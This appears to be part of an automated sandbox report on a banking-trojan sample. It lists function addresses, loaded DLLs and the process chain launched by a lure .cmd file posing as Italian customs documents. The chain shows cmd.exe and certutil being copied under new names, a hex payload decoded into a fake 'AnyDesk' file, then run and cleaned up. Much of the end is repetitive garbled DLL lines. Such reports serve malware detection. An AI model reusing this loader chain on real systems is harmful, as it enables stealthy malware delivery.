      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FD4406_2_00007FF67C4FD440
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B54386_2_00007FF67C4B5438
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52F5206_2_00007FF67C52F520
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5814F06_2_00007FF67C5814F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C526D7C6_2_00007FF67C526D7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4DEDA46_2_00007FF67C4DEDA4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C592D6C6_2_00007FF67C592D6C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C598EAC6_2_00007FF67C598EAC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C594E586_2_00007FF67C594E58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D8F1C6_2_00007FF67C4D8F1C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4EEED46_2_00007FF67C4EEED4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B6EF46_2_00007FF67C4B6EF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E4F906_2_00007FF67C4E4F90
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C554F946_2_00007FF67C554F94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B10306_2_00007FF67C4B1030
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F107C6_2_00007FF67C4F107C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4CB09C6_2_00007FF67C4CB09C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50D0946_2_00007FF67C50D094
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57511C6_2_00007FF67C57511C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5169846_2_00007FF67C516984
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5089906_2_00007FF67C508990
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B29406_2_00007FF67C4B2940
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53AA006_2_00007FF67C53AA00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C58A9F06_2_00007FF67C58A9F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5109EC6_2_00007FF67C5109EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51E9F06_2_00007FF67C51E9F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53EA7C6_2_00007FF67C53EA7C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C536A846_2_00007FF67C536A84
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59AA586_2_00007FF67C59AA58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A4A586_2_00007FF67C5A4A58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C584A406_2_00007FF67C584A40
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C504B306_2_00007FF67C504B30
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C566B946_2_00007FF67C566B94
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D4B686_2_00007FF67C4D4B68
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BAC086_2_00007FF67C4BAC08
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FCBFC6_2_00007FF67C4FCBFC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C500C286_2_00007FF67C500C28
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C528BD46_2_00007FF67C528BD4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54CCA86_2_00007FF67C54CCA8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52CC806_2_00007FF67C52CC80
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5BCC8C6_2_00007FF67C5BCC8C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C588C586_2_00007FF67C588C58
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C512D186_2_00007FF67C512D18
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C508D2C6_2_00007FF67C508D2C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C8D006_2_00007FF67C4C8D00
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C542CF86_2_00007FF67C542CF8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50CD106_2_00007FF67C50CD10
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A8CF46_2_00007FF67C5A8CF4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5025806_2_00007FF67C502580
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A85A86_2_00007FF67C5A85A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C54E57C6_2_00007FF67C54E57C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51655C6_2_00007FF67C51655C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4E85706_2_00007FF67C4E8570
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5845386_2_00007FF67C584538
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5186306_2_00007FF67C518630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57C6306_2_00007FF67C57C630
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5B85EC6_2_00007FF67C5B85EC
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C05E06_2_00007FF67C4C05E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52C6F86_2_00007FF67C52C6F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C51C6D06_2_00007FF67C51C6D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A67506_2_00007FF67C5A6750
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53C7F06_2_00007FF67C53C7F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5327D06_2_00007FF67C5327D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5607D06_2_00007FF67C5607D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53E8446_2_00007FF67C53E844
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5A28546_2_00007FF67C5A2854
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5948C46_2_00007FF67C5948C4
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5908C86_2_00007FF67C5908C8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D01406_2_00007FF67C4D0140
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4B81706_2_00007FF67C4B8170
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C57821C6_2_00007FF67C57821C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5C41F86_2_00007FF67C5C41F8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53A1E86_2_00007FF67C53A1E8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50C1D06_2_00007FF67C50C1D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C50E29C6_2_00007FF67C50E29C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D227C6_2_00007FF67C4D227C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5262806_2_00007FF67C526280
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5942746_2_00007FF67C594274
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5103986_2_00007FF67C510398
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4FE3A06_2_00007FF67C4FE3A0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5463746_2_00007FF67C546374
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59234C6_2_00007FF67C59234C
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4D44106_2_00007FF67C4D4410
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C59E4306_2_00007FF67C59E430
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5C842F6_2_00007FF67C5C842F
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BA4246_2_00007FF67C4BA424
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5384146_2_00007FF67C538414
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5443D06_2_00007FF67C5443D0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4F64A86_2_00007FF67C4F64A8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5084846_2_00007FF67C508484
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5904906_2_00007FF67C590490
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5484886_2_00007FF67C548488
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52C4506_2_00007FF67C52C450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C52A4506_2_00007FF67C52A450
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4BC5206_2_00007FF67C4BC520
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5984D86_2_00007FF67C5984D8
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C53E4F06_2_00007FF67C53E4F0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C4C44E06_2_00007FF67C4C44E0
      Source: C:\Users\Public\kn.exeCode function: 6_2_00007FF67C5224D46_2_00007FF67C5224D4
      Source: C:\Users\Public\Libraries\AnyDesk.PIFCode function: 9_2_02B620C49_2_02B620C4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBAA5410_2_00007FF7E1DBAA54
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB8DF810_2_00007FF7E1DB8DF8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC555410_2_00007FF7E1DC5554
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC785410_2_00007FF7E1DC7854
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB341010_2_00007FF7E1DB3410
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC37D810_2_00007FF7E1DC37D8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DD7F0010_2_00007FF7E1DD7F00
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB6EE410_2_00007FF7E1DB6EE4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBE68010_2_00007FF7E1DBE680
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDEE8810_2_00007FF7E1DDEE88
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC0A6C10_2_00007FF7E1DC0A6C
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB524010_2_00007FF7E1DB5240
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBD25010_2_00007FF7E1DBD250
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB9E5010_2_00007FF7E1DB9E50
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB765010_2_00007FF7E1DB7650
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB222010_2_00007FF7E1DB2220
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC422410_2_00007FF7E1DC4224
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB4A3010_2_00007FF7E1DB4A30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDAA3010_2_00007FF7E1DDAA30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBCE1010_2_00007FF7E1DBCE10
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDD9D010_2_00007FF7E1DDD9D0
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB81D410_2_00007FF7E1DB81D4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DE153810_2_00007FF7E1DE1538
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB7D3010_2_00007FF7E1DB7D30
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB851010_2_00007FF7E1DB8510
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DBB0D810_2_00007FF7E1DBB0D8
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DC18D410_2_00007FF7E1DC18D4
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DB188410_2_00007FF7E1DB1884
      Source: C:\Users\Public\alpha.exeCode function: 10_2_00007FF7E1DDAC4C10_2_00007FF7E1DDAC4C
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF7E1DB2C48
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF7E1DB6BE0
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF7E1DDAFBC
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF7E1DB3F90
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF7E1DB5B70
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF7E1DB9B50
      Source: C:\Users\Public\alpha.exe Code function: 10_2_00007FF7E1DB372C
      Source: C:\Users\Public\alpha.exe Code function: String function: 00007FF7E1DC3448 appears 54 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C577BAC appears 34 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C577D70 appears 35 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C4EBC9C appears 280 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C4BD1C8 appears 41 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C5C64A6 appears 173 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C54EB98 appears 93 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C56ABFC appears 818 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C5BF11C appears 37 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C5BF1B8 appears 183 times
      Source: C:\Users\Public\kn.exe Code function: String function: 00007FF67C570D10 appears 181 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: String function: 02B64860 appears 949 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: String function: 02B64500 appears 33 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: String function: 02B644DC appears 74 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: String function: 02B7894C appears 56 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: String function: 02B789D0 appears 45 times
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Code function: String function: 02B646D4 appears 244 times
      Source: classification engine Classification label: mal100.bank.troj.evad.winCMD@22/11@1/1
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF7E1DB32B0 _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,wcschr,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,GetLastError,GetLastError
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C59826C GetCurrentThread,GetLastError,#357,OpenThreadToken,GetLastError,GetCurrentProcess,GetLastError,OpenProcessToken,GetLastError,AdjustTokenPrivileges,GetLastError,GetLastError,CloseHandle,CloseHandle
      Source: C:\Users\Public\alpha.exe Code function: 3_2_00007FF7E1DDFB54 memset,GetDiskFreeSpaceExW,??_V@YAXPEAX@Z
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C4B7DE0 wcschr,#357,wcschr,CoCreateInstance,#359,SysFreeString,SysFreeString,SysAllocString,SysFreeString,#359,SysFreeString,SysFreeString,#357,SysFreeString,SysFreeString,LocalAlloc,#357,#357,SysFreeString,SysFreeString,memmove,SysFreeString,SysFreeString,#357,SysFreeString,SysFreeString,#256,#359
      Source: C:\Users\Public\kn.exe Code function: 6_2_00007FF67C5C3148 FindResourceExW,LoadResource
      Source: C:\Windows\System32\extrac32.exe File created: C:\Users\Public\alpha.exe
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7416:120:WilError_03
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
      Source: C:\Windows\System32\extrac32.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: unknown Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\extrac32.exe C:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Users\Public\alpha.exe Process created: C:\Windows\System32\extrac32.exe extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
      Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\Users\user\Desktop\Documentazione_Doganale_richieste_di_copia.cmd" "C:\\Users\\Public\\AnyDesk.jpeg" 9
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
      Source: C:\Users\Public\alpha.exe Process created: C:\Users\Public\kn.exe C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\AnyDesk.jpeg" "C:\\Users\\Public\\Libraries\\AnyDesk.PIF" 12
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\Libraries\AnyDesk.PIF C:\Users\Public\Libraries\AnyDesk.PIF
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exe Process created: C:\Users\Public\alpha.exe C:\\Users\\Public\\alpha /c del /q "C:\Users\Public\AnyDesk.jpeg" / A / F / Q / S
      Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
      Source: C:\Windows\System32\cmd.exe Section loaded: apphelp.dll
      Source: C:\Windows\System32\extrac32.exe Section loaded: cabinet.dll
      Source: C:\Windows\System32\extrac32.exe Section loaded: uxtheme.dll
      Source: C:\Windows\System32\extrac32.exe Section loaded: kernel.appcore.dll
      Source: C:\Windows\System32\extrac32.exe Section loaded: textinputframework.dll
      Source: C:\Windows\System32\extrac32.exe Section loaded: coreuicomponents.dll
      Source: C:\Windows\System32\extrac32.exe Section loaded: coremessaging.dll
      Source: C:\Windows\System32\extrac32.exe Section loaded: ntmarta.dll
      Source: C:\Windows\System32\extrac32.exe Section loaded: wintypes.dll
      Source: C:\Windows\System32\extrac32.exe Section loaded: textshaping.dll
      Source: C:\Users\Public\kn.exe Section loaded: certcli.dll
      Source: C:\Users\Public\kn.exe Section loaded: cabinet.dll
      Source: C:\Users\Public\kn.exe Section loaded: cryptui.dll
      Source: C:\Users\Public\kn.exe Section loaded: ncrypt.dll
      Source: C:\Users\Public\kn.exe Section loaded: netapi32.dll
      Source: C:\Users\Public\kn.exe Section loaded: ntdsapi.dll
      Source: C:\Users\Public\kn.exe Section loaded: version.dll
      Source: C:\Users\Public\kn.exe Section loaded: secur32.dll
      Source: C:\Users\Public\kn.exe Section loaded: certca.dll
      Source: C:\Users\Public\kn.exe Section loaded: cryptsp.dll
      Source: C:\Users\Public\kn.exe Section loaded: samcli.dll
      Source: C:\Users\Public\kn.exe Section loaded: logoncli.dll
      Source: C:\Users\Public\kn.exe Section loaded: dsrole.dll
      Source: C:\Users\Public\kn.exe Section loaded: netutils.dll
      Source: C:\Users\Public\kn.exe Section loaded: sspicli.dll
      Source: C:\Users\Public\kn.exe Section loaded: ntasn1.dll
      Source: C:\Users\Public\kn.exe Section loaded: uxtheme.dll
      Source: C:\Users\Public\kn.exe Section loaded: profapi.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: apphelp.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: version.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: uxtheme.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: url.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: ieframe.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: iertutil.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: netapi32.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: userenv.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: winhttp.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: wkscli.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIF Section loaded: netutils.dll
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ?p .dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ???p.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
      Source: C:\Users\Public\Libraries\AnyDesk.PIFSection loaded: ??.dllJump to behavior
